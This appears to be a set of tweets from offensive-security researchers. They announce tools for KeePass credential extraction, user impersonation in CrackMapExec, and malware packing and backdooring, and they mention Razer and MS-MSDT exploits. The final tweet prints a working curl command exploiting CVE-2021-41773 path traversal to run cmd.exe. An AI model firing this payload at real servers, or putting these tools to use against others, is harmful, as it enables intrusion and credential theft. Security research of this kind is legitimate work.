My good friend @cd_root_ is looking for a new job. If you have open position for senior pentesters, please reach out to him. Others pls rt for visibility :).
Thank you.
PoC for arbitrary file delete/move in #Razer Macro module that is not fixed as their bug hunting team do not consider this a bug but an exploit 🙃.
https://t.co/XnKnmH1q7c
Execute commands as another user w/t dumping LSASS or touching the ADCS server ? Thanks to @Defte_ a new module has been added to CrackMapExec 🚀
The module will impersonate any logged on user to exec command as "this" user (system, domain user etc) 🔥
Just released KeeFarce Reborn, yet another offensive KeePass extraction tool featuring a standalone DLL that exports databases in cleartext once injected in the KeePass process 🔓
https://t.co/uHc5I8RFVo
🔥Working hard on a public release of my Malware Dev CI/CD toolkit
☢️ProtectMyTooling - Multi-Packer, supporting 23+ obfuscators
☢️RedBackdoorer - PE shellcode injection via 6 techniques
☢️RedWatermarker - IOC injector for implants tracking
Already available to my sponsors 😁✨
Reproduced the MS-MSDT Office RCE (on up-to-date Win10 and up-to-date Office 2019). Had some troubles with building the appropriate docx with external HTML reference, so quickly made some notes how to do it, step-by-step: https://t.co/zutxokWF4W
Never tried this before! 200 RTs and I will do an 'Introduction to Azure Penetration Testing' class for FREE sometime during the Holiday season. #Azure#Pentesting#redteam
CVE-2021-41773 was such a weird bug to see in 2021. I can't believe that this actually worked. On Windows stdin/stdout doesn't appear mapped to exec'd binaries but GET args work fine.
* curl -vv "http://x.x.x.x/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe"